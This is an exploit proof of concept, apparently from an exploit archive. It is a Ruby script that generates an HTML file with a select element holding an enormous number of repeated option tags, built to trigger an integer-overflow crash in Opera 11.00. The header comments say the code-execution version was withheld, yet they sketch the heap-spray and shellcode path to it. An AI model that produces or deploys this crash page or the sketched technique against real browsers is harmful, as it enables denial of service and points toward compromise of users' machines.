1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 |
# # #[+]Exploit Title: Exploit Integer Overflow Opera Web Browser 11.00 #[+]Date: 24\01\2011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://get12.opera.com/pub/opera/win/1100/int/Opera_1100_int_Setup.exe #[+]Version: 11.00 #[+]Tested On: WIN-XP SP3 PORTUGUESE BRAZILIAN #[+]CVE: N/A # # # #Note: #This exploit is only a Denial of Service in opera web browser #I created a poc using heap spray that allow code execution #but I will not post here because it can be used for evil #And I do not want that. # for you to explore the program you control with the number esi childrens then created using a spray heap address any such #0a0a0a0a the data in address should be the point to the beginning of the shellcode #0a0a0a0a => \x90\x90\x90 => and your shellcode #Then the function mov eax, [esi] places the value in eax then the program call eaxand boom run shellcode !!!!! # # # print "[*]Creating the Exploit\n" i = 0 buf = "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>\n" while i<0x4141 buf += "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>\n" i+=1 end HTML = "<html>\n"+ "<body>\n\n"+ "<select>\n\n" HTML+=buf * 100 HTML += "\n\n\n\</select>\n\n"+ "</body>\n\n\n"+ "</html>\n\n\n\n\n" f = File.open("Exploit_opera_11.00.html","w") f.puts HTML f.close puts "\n\n\[*]File Created With Sucess" sleep(1) puts "[*]Go to my Site www.invasao.com.br!" sleep(1) |